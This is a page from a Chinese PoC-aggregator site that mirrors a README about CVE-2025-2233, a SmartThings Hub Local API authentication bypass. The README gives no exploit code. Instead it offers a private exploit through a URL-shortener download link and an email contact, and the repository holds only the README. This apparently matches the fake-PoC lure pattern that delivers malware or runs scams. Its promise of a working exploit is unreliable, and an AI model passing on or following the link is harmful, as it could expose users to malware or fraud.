POC详情: 21a019a6c3b3044dbfa7ecb320fb8ebcb1d3a3cb

来源
关联漏洞
标题: Samsung SmartThings Improper Verification of Cryptographic Signature Authentication Bypass Vulnerability (CVE-2025-2233)
描述:Samsung SmartThings Improper Verification of Cryptographic Signature Authentication Bypass Vulnerability
描述
Improper Verification of Cryptographic Signature (CWE-347)
介绍
# CVE-2025-2233
Improper Verification of Cryptographic Signature (CWE-347)
## Overview
Samsung SmartThings Improper Verification of Cryptographic Signature Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Samsung SmartThings. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Hub Local API service, which listens on TCP port 8766 by default. The issue results from the lack of proper verification of a cryptographic signature. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-25615.

## Exploit:
## [Download here](https://tinyurl.com/3en2dbrw)
## Details
+ **CVE ID**: CVE-2025-2233
+ **Published**: 03/11/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: High
## Impact

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Samsung SmartThings. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the Hub Local API service, which listens on TCP port 8766 by default. The issue results from the lack of proper verification of a cryptographic signature. An attacker can leverage this vulnerability to bypass authentication on the system.
## Affected Versions
Samsung SmartThings 

## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ **Exploit** :[Download here](https://tinyurl.com/3en2dbrw)

文件快照

[4.0K] /data/pocs/21a019a6c3b3044dbfa7ecb320fb8ebcb1d3a3cb └── [1.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。